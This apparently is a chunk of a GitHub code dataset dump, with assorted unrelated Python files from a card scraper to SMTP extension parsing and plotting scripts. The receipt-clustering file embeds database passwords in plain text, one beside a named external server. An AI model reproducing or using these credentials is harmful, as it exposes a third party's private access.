card, feels so jank\n if(details[0].get('class') != ['Description']):\n continue\n \n temp = details[0].text.split(\": \")\n order_history_card = temp[0].strip()\n order_history_set = temp[1].strip()\n order_history_price = details[3].text.replace('$', '').strip()\n\n if order_history_card and order_history_price and order_history_set:\n data[\"Card Name\"].append(order_history_card)\n data[\"Card Set\"].append(order_history_set)\n data[\"Card Purchase Price\"].append(order_history_price)\n return data","repo_name":"angelpyy/MTG-Purchase-Tracker","sub_path":"cardkingdom.py","file_name":"cardkingdom.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71399442327","text":"import random\n\ndef get_determiner(quantity):\n if quantity == 1:\n words = [\"a\", \"one\", \"the\"]\n else:\n words = [\"some\", \"many\", \"the\"]\n\n # Randomly choose and return a determiner.\n word = random.choice(words)\n return word\n\ndef get_noun(quantity):\n if quantity == 1:\n words = [\"bird\", \"boy\", \"car\", \"cat\", \"child\", \"dog\", \"girl\", \"man\", \"rabbit\", \"woman\"]\n else:\n words = [\"birds\", \"boys\", \"cars\", \"cats\", \"children\", \"dogs\", \"girls\", \"men\", \"rabbits\", \"women\"]\n\n # Randomly choose and return a noun.\n word = random.choice(words)\n return word\n\ndef get_verb(quantity, tense):\n if tense == \"past\":\n words = [ \"drank\", \"ate\", \"grew\", \"laughed\", \"thought\", \"ran\", \"slept\", \"talked\", \"walked\", \"wrote\"]\n elif tense == \"present\":\n if quantity == 1:\n words = [\"drinks\", \"eats\", \"grows\", \"laughs\", \"thinks\", \"runs\", \"sleeps\", \"talks\", \"walks\", \"writes\"]\n elif quantity != 1:\n words = [\"drink\", \"eat\", \"grow\", \"laugh\", \"think\", \"run\", \"sleep\", \"talk\", \"walk\", \"write\"]\n elif tense == \"future\":\n words = [\"will drink\", \"will eat\", \"will grow\", \"will laugh\",\n \"will think\", \"will run\", \"will sleep\", \"will talk\", \"will walk\", \"will write\"]\n\n # Randomly choose and return a verb.\n word = random.choice(words)\n return word\n\ndef get_Adjective ():\n # Randomly choose and return a adjective .\n words = [\"good\",\"short\",\"large\",\"little\",\"new, old\",\n \"right\",\"special\",\"strong\",\"red\",\"smart\", \"tall\",\n \"yound\",\"crazy\", \"dead\"]\n\n word = random.choice(words)\n return word\n\ndef get_preposition():\n # Randomly choose and return a preposition.\n words = [\"about\", \"above\", \"across\", \"after\", \"along\",\n \"around\", \"at\", \"before\", \"behind\", \"below\",\n \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n \"from\", \"in\", \"into\", \"near\", \"of\",\n \"off\", \"on\", \"onto\", \"out\", \"over\",\n \"past\", \"to\", \"under\", \"with\", \"without\"]\n word = random.choice(words)\n return word\n\ndef get_prepositional_phrase(quantity):\n\n word_1 = get_preposition()\n word_2 = get_determiner(quantity)\n word_3 = get_noun(quantity)\n\n # Randomly choose and return a verb.\n phrase = f\"{word_1} {word_2} {word_3}\"\n return phrase\n\ndef main(quantity, tense):\n determiner = get_determiner(quantity)\n noun = get_noun(quantity)\n verb = get_verb(quantity, tense)\n phrase = get_prepositional_phrase(quantity)\n adjective = get_Adjective()\n\n print(f\"{determiner} {adjective} {noun} {verb} {phrase}\")\n\nmain(1, \"past\")\nmain(1, \"present\")\nmain(1, \"future\")\nmain(2, \"past\")\nmain(2, \"present\")\nmain(2, \"future\")\n\n","repo_name":"ijarpa/Python","sub_path":"Programming with Functions/sentences.py","file_name":"sentences.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5370521198","text":"import psycopg2\r\nimport pandas as pd\r\nimport gzip\r\nimport random\r\nimport pickle\r\nimport sys\r\n\r\nfrom scipy.spatial import distance\r\nimport psutil\r\nimport numpy as np\r\nimport h5py\r\n\r\nclass DistanceMetric:\r\n\r\n\r\n # function to create distribution of category products\r\n\r\n def create_distribution_vector(self,cat_list,rec_no,dict_of_transactions,index):\r\n\r\n count_cat_level_dict = {}\r\n distribution_cat_level_dict = {}\r\n no_of_items_in_transaction_without_minus1_group = 0\r\n\r\n # For each material of receipt, counting number of materials in appeared category\r\n for material in dict_of_transactions[rec_no]:\r\n\r\n # Ignoring the impact of materials of category '-1\r\n if dict_of_transactions[rec_no][material][index]!='-1':\r\n if dict_of_transactions[rec_no][material][index] not in count_cat_level_dict.keys():\r\n count_cat_level_dict[dict_of_transactions[rec_no][material][index]] = 1\r\n no_of_items_in_transaction_without_minus1_group+=1\r\n else:\r\n count_cat_level_dict[dict_of_transactions[rec_no][material][index]] += 1\r\n no_of_items_in_transaction_without_minus1_group += 1\r\n\r\n # calculating distribution(in %) of each appeared category in receipt\r\n '''\r\n for key in count_cat1_level_dict.keys():\r\n distribution_cat1_level_dict[key] = round((count_cat1_level_dict[key] / len(dict_of_transactions[key1])),2)\r\n\r\n '''\r\n\r\n for key in count_cat_level_dict.keys():\r\n distribution_cat_level_dict[key] = round((count_cat_level_dict[key] /no_of_items_in_transaction_without_minus1_group), 2)\r\n\r\n\r\n #Creating null vector\r\n level_cat_vector_list = [0] * len(cat_list)\r\n\r\n # Updating default distribution vector for receipt\r\n for key in distribution_cat_level_dict.keys():\r\n level_cat_vector_list[cat_list.index(key)] = distribution_cat_level_dict[key]\r\n\r\n\r\n\r\n return level_cat_vector_list\r\n\r\n\r\n def create_material_list(self,dict_of_transactions,receipt_matl_dict,key1):\r\n\r\n value_mat1_list = []\r\n\r\n for key_transaction1 in dict_of_transactions[key1]:\r\n value_mat1_list.append(key_transaction1)\r\n receipt_matl_dict[key1] = value_mat1_list\r\n\r\n del value_mat1_list\r\n\r\n\r\n def find_cat_list(self, query,level, conn):\r\n\r\n cat_list = []\r\n cat = pd.read_sql(query, conn)\r\n\r\n for index, row in cat.iterrows():\r\n cat_list.append(row['level'+str(level)+'_value'])\r\n\r\n return cat_list\r\n\r\n\r\n\r\n def jaccard(self,val1, val2):\r\n return round(1 - (len(val1.intersection(val2)) / len(val1.union(val2))), 2)\r\n\r\n\r\n def create_dict_of_transactions(self,dict_of_transactions,price_list,no_of_products_list,gp):\r\n\r\n for name, group in gp:\r\n df = pd.DataFrame(data=group)\r\n\r\n setOfTransactions = {}\r\n\r\n materials = df['material'].values\r\n\r\n level7_value = df['level7_value'].values\r\n\r\n level6_value = df['level6_value'].values\r\n level5_value = df['level5_value'].values\r\n level4_value = df['level4_value'].values\r\n\r\n\r\n # filtering materils from leergut and tasche metl_grps\r\n for i in range(len(materials)):\r\n if materials[i] not in setOfTransactions.keys() and level7_value[i] not in ['714W0020', '850W0200', '850W9600','851W0100', '851W9600', '852W0100','852W0200', '852W9600']:\r\n setOfTransactions[materials[i]] = list([level7_value[i], level6_value[i], level5_value[i],level4_value[i]])\r\n\r\n # Storing receipte with minimum of 6 materials\r\n dict_of_transactions.update({name: setOfTransactions})\r\n\r\n price_list.append(df['rpa_tsa'].unique())\r\n no_of_products_list.append(df['total_number_of_products'].unique())\r\n\r\n\r\n\r\n def create_diagonal_distance_metric(self,cat_list,keys,dict_of_transactions,index,level):\r\n\r\n level_cat_vector_matrix = []\r\n\r\n for key in keys:\r\n level_cat_vector_matrix.append(self.create_distribution_vector(cat_list, key, dict_of_transactions,index))\r\n\r\n\r\n level_pair_distance = distance.pdist(level_cat_vector_matrix, metric='minkowski', p=1).astype('float16')\r\n\r\n del level_cat_vector_matrix\r\n\r\n with open('./diagonalDistanceMatrixCategory'+str(level)+'JAC_MINKOWSKI_70000.p', 'wb') as fp:\r\n pickle.dump(level_pair_distance, fp, protocol=4)\r\n\r\n\r\n def dist_metric(self,keys,dict_of_transactions,level):\r\n\r\n\r\n try:\r\n #conn = psycopg2.connect(dbname='checkout_data',user='bhavesh', host='geoserver.sb.dfki.de', password='LrVYI%TMT%d3')\r\n conn = psycopg2.connect(dbname='postgres',user='postgres', host='localhost', password='606902bB')\r\n except:\r\n print(\"I am unable to connect to the database\")\r\n '''\r\n data=pd.read_sql(\"select a.rpa_tnr,a.rpa_bdd,a.rpa_dep,a.plant,a.rpa_wid,a.rpa_tsa,a.rpa_trnov,a.rpa_lnecnt,a.rpa_bts,a.umsatzdatum,a.total_number_of_products,a.total_number_of_distinct_products,b.material,c.level7_value,c.level6_value,c.level5_value,c.level4_value from receipts a,receipt_articles b,category_core c where a.receipt_id=b.receipt_id and b.matl_group=c.level7_value and a.plant='1006' and rpa_dep in ('53','54')\",conn)\r\n\r\n #print(len(data))\r\n #print(data)\r\n #print(data['level6_value'])\r\n '''\r\n\r\n\r\n # Category level7\r\n\r\n if level==7:\r\n\r\n cat_list=self.find_cat_list(\"select distinct level7_value from category_core\",7,conn)\r\n index=0\r\n\r\n\r\n # Category level6\r\n elif level==6:\r\n\r\n cat_list = self.find_cat_list(\"select distinct level6_value from category_core\",6, conn)\r\n index = 1\r\n\r\n\r\n # Category level5\r\n\r\n elif level==5:\r\n cat_list = self.find_cat_list(\"select distinct level5_value from category_core\",5,conn)\r\n index=2\r\n\r\n\r\n # Category level4\r\n elif level==4:\r\n cat_list = self.find_cat_list(\"select distinct level4_value from category_core\",4, conn)\r\n index=3\r\n\r\n\r\n\r\n '''\r\n # Grouping data by transaction nr and booking date\r\n gp = data.groupby(by=['rpa_tnr', 'rpa_bdd','plant','rpa_dep','rpa_wid','rpa_tsa','rpa_trnov','rpa_lnecnt','rpa_bts','umsatzdatum','total_number_of_products','total_number_of_distinct_products'], sort=False, group_keys=False, squeeze=True)\r\n\r\n # Creating dictionary of transactions\r\n dict_of_transactions = dict()\r\n self.create_dict_of_transactions(dict_of_transactions,gp)\r\n '''\r\n '''\r\n\r\n # Storing details of receipts, can be used later for inspecting cluster quality\r\n with open('./transactionAsSetofMaterialsMtl_grpCat7654.p', 'wb') as fp:\r\n pickle.dump(dict_of_transactions, fp)\r\n '''\r\n\r\n\r\n\r\n\r\n '''\r\n number_groups = len(dict_of_transactions)\r\n print(number_groups)\r\n receipts_bdd = list(dict_of_transactions.keys())\r\n\r\n keys = random.sample(receipts_bdd, 70000)\r\n print(keys)\r\n\r\n del receipts_bdd\r\n del number_groups\r\n\r\n # Storing details of receipts, can be used later for inspecting cluster quality\r\n with open('./keys_70000.p', 'wb') as fp:\r\n pickle.dump(keys, fp)\r\n\r\n '''\r\n\r\n self.create_diagonal_distance_metric(cat_list,keys,dict_of_transactions,index,level)\r\n\r\n\r\n","repo_name":"BhaveshBhansali/Offline_Retail_Recommender_System","sub_path":"RecommenderSystem/Clustering/ClusterDistance.py","file_name":"ClusterDistance.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14147724807","text":"import os\nimport json\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mpl\nimport seaborn as sns\n\ndef plot_distribution(dataset_name):\n filepath = 'benchmarks/parameters/{}'.format(dataset_name)\n \n # Set style to colorblind\n sns.set(style='whitegrid', palette='colorblind')\n\n # Load log data per model\n # PyPHM: p_entailment, A_conf, I_conf, E_conf, O_conf\n # mReasoner: epsilon, lambda, omega, sigma\n # TransSet: nvc_aversion, anchor_set, particularity, negativity\n\n\n # Individual analysis\n params_transset_indiv = []\n params_mreasoner_indiv = []\n params_phm_indiv = []\n\n for fname in os.listdir(filepath):\n if not fname.endswith('.json'):\n continue\n \n with open(filepath + \"/\" + fname) as fh:\n agg_log = json.load(fh)\n condition = fname.split(\"_\")[1][:-5]\n\n # Extract TransSet\n for subj, data in agg_log['TransSet'].items():\n p_nvc_aversion = data['nvc_aversion']\n p_anchor_set = data['anchor_set']\n p_particularity = data['particularity']\n p_negativity = data['negativity']\n\n params_transset_indiv.append({\n 'model': 'TransSet',\n 'condition': condition,\n 'id': subj,\n 'nvc_aversion': p_nvc_aversion,\n 'anchor_set': p_anchor_set,\n 'particularity': p_particularity,\n 'negativity': p_negativity\n })\n \n # Extract mReasoner\n for subj, data in agg_log['mReasoner'].items():\n p_epsilon = data['epsilon']\n p_lambda = data['lambda']\n p_omega = data['omega']\n p_sigma = data['sigma']\n\n params_mreasoner_indiv.append({\n 'model': 'mReasoner',\n 'condition': condition,\n 'id': subj,\n 'epsilon': p_epsilon,\n 'lambda': p_lambda,\n 'omega': p_omega,\n 'sigma': p_sigma\n })\n \n # Extract PHM\n for subj, data in agg_log['PyPHM'].items():\n p_p_entailment = data['p_entailment']\n p_A_conf = data['A_conf']\n p_I_conf = data['I_conf']\n p_E_conf = data['E_conf']\n p_O_conf = data['O_conf']\n\n params_phm_indiv.append({\n 'model': 'PyPHM',\n 'condition': condition,\n 'id': subj,\n 'p_entailment': p_p_entailment,\n 'A_conf': p_A_conf,\n 'I_conf': p_I_conf,\n 'E_conf': p_E_conf,\n 'O_conf': p_O_conf\n })\n \n # Convert to dataframes\n df_params_transset_indiv = pd.DataFrame(params_transset_indiv)\n df_params_mreasoner_indiv = pd.DataFrame(params_mreasoner_indiv)\n df_params_phm_indiv = pd.DataFrame(params_phm_indiv)\n\n # Visualize distribution\n pnames_transset = ['nvc_aversion', 'anchor_set', 'particularity', 'negativity']\n pnames_mreasoner = ['epsilon', 'lambda', 'omega', 'sigma']\n greek_mreasoner = ['$\\epsilon$', '$\\lambda$', '$\\omega$', '$\\sigma$']\n pnames_phm = ['p_entailment', 'A_conf', 'I_conf', 'E_conf', 'O_conf']\n\n hue_order = ['control', 'feedback']\n plot_width = 8\n plot_height = 2\n\n # TransSet\n fig, axs = plt.subplots(1, 4, figsize=(plot_width, plot_height))\n\n for idx, pname in enumerate(pnames_transset):\n pdf = df_params_transset_indiv[['condition', pname]]\n \n plot_data = []\n for condition, condition_df in pdf.groupby('condition'):\n keys, cnts = np.unique(condition_df[pname], return_counts=True)\n cnts = cnts.astype('float')\n cnts /= cnts.sum()\n \n addendum = [{'condition': condition, 'label': x, 'value': y} for x, y in zip(keys, cnts)]\n plot_data.extend(addendum)\n \n df_plot = pd.DataFrame(plot_data)\n sns.barplot(x='label', y='value', hue='condition', data=df_plot, hue_order=hue_order, ax=axs[idx])\n \n axs[idx].get_legend().remove()\n axs[idx].set_xlabel(pname)\n axs[idx].set_ylim(0, 1)\n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_yticklabels([])\n else:\n axs[idx].set_ylabel('Proportion')\n\n fig.suptitle('TransSet')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n fig.savefig('{}_transset.pdf'.format(dataset_name))\n plt.show()\n\n # mReasoner\n fig, axs = plt.subplots(1, 4, figsize=(plot_width, plot_height))\n df_params_mreasoner_indiv = df_params_mreasoner_indiv[pnames_mreasoner + ['condition']]\n\n for idx, pname in enumerate(pnames_mreasoner):\n sns.kdeplot(x=pname, hue='condition', data=df_params_mreasoner_indiv, hue_order=hue_order, ax=axs[idx], legend=False, common_norm=False)\n \n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_xlabel(greek_mreasoner[idx])\n fig.suptitle('mReasoner')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n plt.savefig('{}_mreasoner.pdf'.format(dataset_name))\n plt.show()\n\n # PHM\n fig, axs = plt.subplots(1, 5, figsize=(plot_width, plot_height))\n\n for idx, pname in enumerate(pnames_phm):\n pdf = df_params_phm_indiv[['condition', pname]]\n \n plot_data = []\n for condition, condition_df in pdf.groupby('condition'):\n keys, cnts = np.unique(condition_df[pname], return_counts=True)\n cnts = cnts.astype('float')\n cnts /= cnts.sum()\n \n addendum = [{'condition': condition, 'label': x, 'value': y} for x, y in zip(keys, cnts)]\n plot_data.extend(addendum)\n \n df_plot = pd.DataFrame(plot_data)\n sns.barplot(x='label', y='value', hue='condition', data=df_plot, hue_order=hue_order, ax=axs[idx])\n \n axs[idx].get_legend().remove()\n axs[idx].set_xlabel(pname)\n axs[idx].set_ylim(0, 1)\n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_yticklabels([])\n else:\n axs[idx].set_ylabel('Proportion')\n \n fig.suptitle('PHM')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n plt.savefig('{}_phm.pdf'.format(dataset_name))\n plt.show()\n \nplot_distribution(\"dames2020\")\nplot_distribution(\"brand2021\")","repo_name":"Shadownox/iccm-feedbackexplanation","sub_path":"analysis/plot_param_distribution.py","file_name":"plot_param_distribution.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28618644278","text":"import json\r\nfrom datetime import datetime,time\r\nimport matplotlib.pyplot as plot\r\n\r\ndef danmaku2datetimes(danmaku_dict):\r\n\tdanmaku_dict.sort(key=lambda i:i['row'])\r\n\tdanmaku2date_times = [[],[]]\r\n\tfor i in danmaku_dict:\r\n\t\tdate_time = datetime(i['submit_time']['year'],i['submit_time']['month'],i['submit_time']['day'],i['submit_time']['hour'])\r\n\t\tif date_time not in danmaku2date_times[0]:\r\n\t\t\tdanmaku2date_times[0].append(date_time)\r\n\t\t\tdanmaku2date_times[1].append(1)\r\n\t\telse:\r\n\t\t\tdanmaku2date_times[1][len(danmaku2date_times[1])-1] += 1\r\n\treturn danmaku2date_times\r\n\r\ndef danmaku2vidtimes(danmaku_dict, div):\r\n\tdanmaku_dict.sort(key=lambda i:i['appear_time']['min']*60+i['appear_time']['sec'])\r\n\tdanmaku2vid_times = [[],[]]\r\n\tfor i in danmaku_dict:\r\n\t\tvid_time = datetime(1,1,1,1,i['appear_time']['min'],i['appear_time']['sec']//div*div)\r\n\t\tif vid_time not in danmaku2vid_times[0]:\r\n\t\t\tdanmaku2vid_times[0].append(vid_time)\r\n\t\t\tdanmaku2vid_times[1].append(1)\r\n\t\telse:\r\n\t\t\tdanmaku2vid_times[1][len(danmaku2vid_times[1])-1] += 1\r\n\treturn danmaku2vid_times\r\n\r\ndef main():\r\n\tprint('Loading danmaku data...')\r\n\tdanmaku_dict = []\r\n\tfilename = 'av44625717_2019-02-25 to 2019-03-01'\r\n\twith open(filename+'.json','r',encoding='utf-8') as jfile:\r\n\t\tdanmaku_dict = json.load(jfile)\r\n\r\n\t# plot.subplot(1,2,1)\r\n\t# plot.plot(*danmaku2date_times)\r\n\t# plot.gcf().autofmt_xdate()\r\n\t# plot.subplot(1,2,2)\r\n\r\n\tprint('Plotting data...')\r\n\tdiv = 5 #每5秒的弹幕算在一起\r\n\tdanmaku2vid_times = danmaku2vidtimes(danmaku_dict, div)\r\n\tplot.plot(*danmaku2vid_times,'r-o')\r\n\tplot.xlim([datetime(1,1,1,1,0,0),datetime(1,1,1,1,12,30)]) #设置X轴范围\r\n\tplot.grid(True, linestyle='-.')\r\n\r\n\tdiv *= 3\r\n\tplot.xticks([datetime(1,1,1,1,i//60,i%60) for i in range(0,(12*60+30)+div,div)],\r\n\t\t[str(time(0,i//60,i%60))[3:] for i in range(0,(12*60+30)+div,div)],rotation=60) #划分X轴\r\n\t\r\n\tprint('Generating image...')\r\n\tfig = plot.gcf()\r\n\tfig.set_size_inches(18.5,10.5)#设置图片大小\r\n\tfig.savefig('plot.png')\r\n\tplot.show()\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"Antoxxx/DanmakuAnalysis","sub_path":"danmaku2time_graph.py","file_name":"danmaku2time_graph.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2484245183","text":"import sys\n\nfrom src.persistence import get_data_input, write_data_output\nfrom src.transforms import group_by_ikid, update_sector_column, add_daily_return_column\n\n\ndef main(csv_input_path: str, csv_output_path: str):\n dataframe = get_data_input(csv_input_path)\n transforms = [group_by_ikid, update_sector_column, add_daily_return_column]\n for transform in transforms:\n dataframe = transform(dataframe)\n write_data_output(dataframe, csv_output_path)\n\n\nif __name__ == \"__main__\":\n input_path, output_path = sys.argv[1], sys.argv[2]\n main(input_path, output_path)\n","repo_name":"wfq2/lk-processor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34621790928","text":"import os\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\n\npath_directory = '/home/mic/old-html/posts_notes_md'\npyfile_directory = '/home/mic/python/paste_pygments/python_config_files'\nfor filename in os.listdir(path_directory):\n print(os.path.join(path_directory, filename))\npyfile_directory = '/home/mic/python/paste_pygments/python_config_files'\npath = os.path.join(path_directory, filename)\ncode = \"\"\"---\ntitle: Python Debugger Trepan3k\ntags:\n- trepan3k\n- debug\n- debugger\n---\n\n To use the Trepan3k (python 3 version of Trepan2), we can,as an\n example, construct the following command line expression:\n ----------------------------------------------------------------\n trepan3k --highlight=light -o file_to_debugged.py\n ----------------------------------------------------------------\n The flag '--highlight', colorizes the output. It can be light or\n dark.\n The flag '-o' defines to what file will go the output of the\n debugging. BEWARE, if you choose this, you wont see the output\n when running it from the terminal.\n https://python2-trepan.readthedocs.io\n\"\"\"\npyfile = pyfile_directory + '/' + filename[:-3] + '.py'\nlexer = get_lexer_by_name('python', stripall=True)\nformatter = HtmlFormatter(linenos=True, full=True, style='zenburn')\nf = open(pyfile[:-3] + '.html', 'w')\nhighlight(code, lexer, formatter, outfile=f)\n","repo_name":"miccaldas/old_alternative_projects","sub_path":"paste_pygments/python_config_files/trepan.py","file_name":"trepan.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13439227222","text":"\n# f2 = open('data1','w')\n# f3 = f2.write('Time and tide is waits for none')\n# print(f3)\n# f2.close()\n\n\n# a\t\tOpen a file in the append mode and add new content at the end of the file.\nf2 = open('data1','a')\nf3 = f2.write('\\nall glitters are not gold')\nprint(f3)\nf2.close()\n\n\n\n\n\n","repo_name":"Mani015/Python_Aug","sub_path":"Python_Notes/Day54(File Handling)/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23550633340","text":"#光线传感器\nimport RPi.GPIO as GPIO\nimport time\n\nPin = 26 # GPIO Pin 26\n\nGPIO.setmode(GPIO.BCM)\ntime.sleep(1)\n# Setup light sensor pin status\nGPIO.setup(Pin, GPIO.OUT)\nGPIO.output(Pin, GPIO.LOW)\ntime.sleep(0.5)\nGPIO.output(Pin, GPIO.HIGH)\nGPIO.setup(Pin, GPIO.IN)\n\ntry:\n print(\"LDR Online\")\n i = 0\n while True:\n v = GPIO.input(Pin)\n print(v)\n if v == GPIO.LOW:\n i = i + 1\n print(\"LOW\")\n if v == GPIO.HIGH:\n print(\"HIGH\")\n time.sleep(2)\n\nexcept (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n print(\"LDR Outline\")\n pass\n","repo_name":"corcd/Pi_Sensor","sub_path":"core/Pi_LDR.py","file_name":"Pi_LDR.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24031796241","text":"# Converts a directory tree of sublime-snippet files to a single JSON snippets file for Atom\nimport os, untangle, json\n\ndata = {}\ndata['.source.papyrus.fallout4'] = {}\n\nfor root, dirs, files in os.walk('.'):\n\tfor f in files:\n\t\tif f.endswith('.sublime-snippet'):\n\t\t\tfilePath = os.path.join(root, f)\n\t\t\tprint('Parsing ' + filePath)\n\t\t\txml = untangle.parse(filePath)\n\t\t\tsnippetName = xml.snippet.description.cdata\n\t\t\tif '.' not in snippetName: snippetName += '.' + xml.snippet.tabTrigger.cdata\n\t\t\tsnippet = data['.source.papyrus.fallout4'][snippetName] = {}\n\t\t\tsnippet['prefix'] = xml.snippet.tabTrigger.cdata\n\t\t\tsnippet['body'] = xml.snippet.content.cdata.replace(' ', '\\t')\n\njson.dump(data, open('snippets.json', 'w'), indent='\\t')\n","repo_name":"Gawdl3y/atom-language-papyrus","sub_path":"BuildJSONSnippetFile.py","file_name":"BuildJSONSnippetFile.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"73343921367","text":"\ndef get_context_layoutlm(document, dpi_norm):\n context = []\n for page in document:\n for token in page[\"tokens\"]:\n pos = token[\"position\"]\n offset = token[\"doc_offset\"]\n width = page[\"pages\"][0][\"size\"][\"width\"]\n height = page[\"pages\"][0][\"size\"][\"height\"]\n context.append(\n {\n \"top\": int(pos[\"top\"] / height * 1000),\n \"bottom\": int(pos[\"bottom\"] / height * 1000),\n \"left\": int(pos[\"left\"] / width * 1000),\n \"right\": int(pos[\"right\"] / width * 1000),\n \"start\": offset[\"start\"],\n \"end\": offset[\"end\"],\n \"text\": token[\"text\"],\n }\n )\n return context\n\n\ndef get_context_doc_rep(document, dpi_norm):\n context = []\n for page in document:\n # This norm factor is\n if dpi_norm:\n dpi = page[\"pages\"][0][\"dpi\"]\n x_norm = 300 / dpi[\"dpix\"]\n y_norm = 300 / dpi[\"dpiy\"]\n else:\n x_norm = 1.0\n y_norm = 1.0\n\n for token in page[\"tokens\"]:\n pos = token[\"position\"]\n offset = token[\"doc_offset\"]\n context.append(\n {\n \"top\": pos[\"top\"] * y_norm,\n \"bottom\": pos[\"bottom\"] * y_norm,\n \"left\": pos[\"left\"] * x_norm,\n \"right\": pos[\"right\"] * x_norm,\n \"start\": offset[\"start\"],\n \"end\": offset[\"end\"],\n \"text\": token[\"text\"],\n }\n )\n return context\n","repo_name":"IndicoDataSolutions/finetune","sub_path":"finetune/util/context_utils.py","file_name":"context_utils.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":692,"dataset":"github-code","pt":"31"} +{"seq_id":"31767281375","text":"\"\"\"\nESMTP utils\n\"\"\"\nimport re\nfrom typing import Dict, List, Tuple\n\n\n__all__ = (\"parse_esmtp_extensions\",)\n\n\nOLDSTYLE_AUTH_REGEX = re.compile(r\"auth=(?P.*)\", flags=re.I)\nEXTENSIONS_REGEX = re.compile(r\"(?P[A-Za-z0-9][A-Za-z0-9\\-]*) ?\")\n\n\ndef parse_esmtp_extensions(message: str) -> Tuple[Dict[str, str], List[str]]:\n \"\"\"\n Parse an EHLO response from the server into a dict of {extension: params}\n and a list of auth method names.\n\n It might look something like:\n\n 220 size.does.matter.af.MIL (More ESMTP than Crappysoft!)\n EHLO heaven.af.mil\n 250-size.does.matter.af.MIL offers FIFTEEN extensions:\n 250-8BITMIME\n 250-PIPELINING\n 250-DSN\n 250-ENHANCEDSTATUSCODES\n 250-EXPN\n 250-HELP\n 250-SAML\n 250-SEND\n 250-SOML\n 250-TURN\n 250-XADR\n 250-XSTA\n 250-ETRN\n 250-XGEN\n 250 SIZE 51200000\n \"\"\"\n esmtp_extensions = {}\n auth_types: List[str] = []\n\n response_lines = message.split(\"\\n\")\n\n # ignore the first line\n for line in response_lines[1:]:\n # To be able to communicate with as many SMTP servers as possible,\n # we have to take the old-style auth advertisement into account,\n # because:\n # 1) Else our SMTP feature parser gets confused.\n # 2) There are some servers that only advertise the auth methods we\n # support using the old style.\n auth_match = OLDSTYLE_AUTH_REGEX.match(line)\n if auth_match is not None:\n auth_type = auth_match.group(\"auth\")\n auth_types.append(auth_type.lower().strip())\n\n # RFC 1869 requires a space between ehlo keyword and parameters.\n # It's actually stricter, in that only spaces are allowed between\n # parameters, but were not going to check for that here. Note\n # that the space isn't present if there are no parameters.\n extensions = EXTENSIONS_REGEX.match(line)\n if extensions is not None:\n extension = extensions.group(\"ext\").lower()\n params = extensions.string[extensions.end(\"ext\") :].strip()\n esmtp_extensions[extension] = params\n\n if extension == \"auth\":\n auth_types.extend([param.strip().lower() for param in params.split()])\n\n return esmtp_extensions, auth_types\n","repo_name":"cole/aiosmtplib","sub_path":"aiosmtplib/esmtp.py","file_name":"esmtp.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"31"} +{"seq_id":"43321592475","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 5 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom scipy.stats import t\r\nfrom scipy.stats import norm\r\nfrom matplotlib import cm # Colormaps\r\n\r\nx = np.linspace(start = -5, stop = 5, num = 200)\r\n\r\n# plot PDF curves\r\n\r\nfig, ax = plt.subplots()\r\n\r\nDFs = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 25, 30]\r\n\r\ncolors = plt.cm.RdYlBu_r(np.linspace(0,1,len(DFs)))\r\n\r\nfor i in range(0,len(DFs)):\r\n df = DFs[i]\r\n plt.plot(x, t.pdf(x, df = df, loc = 0, scale = 1), \r\n color = colors[int(i)],\r\n label = \"\\u03BD = \" + str(df))\r\n\r\nax.axvline(x = 0, color = 'k', linestyle = '--')\r\n# compare with normal\r\nplt.plot(x,norm.pdf(x,loc = 0, scale = 1), color = 'k', label = 'Normal')\r\nplt.ylim((0, 0.5))\r\nplt.xlim((-5,5))\r\nplt.title(\"PDF of student's t\")\r\nplt.ylabel(\"PDF\")\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n# plot CDF curves\r\nfig, ax = plt.subplots()\r\n\r\nfor i in range(0,len(DFs)):\r\n df = DFs[i]\r\n plt.plot(x, t.cdf(x, df = df, loc = 0, scale = 1), \r\n color = colors[int(i)],\r\n label = 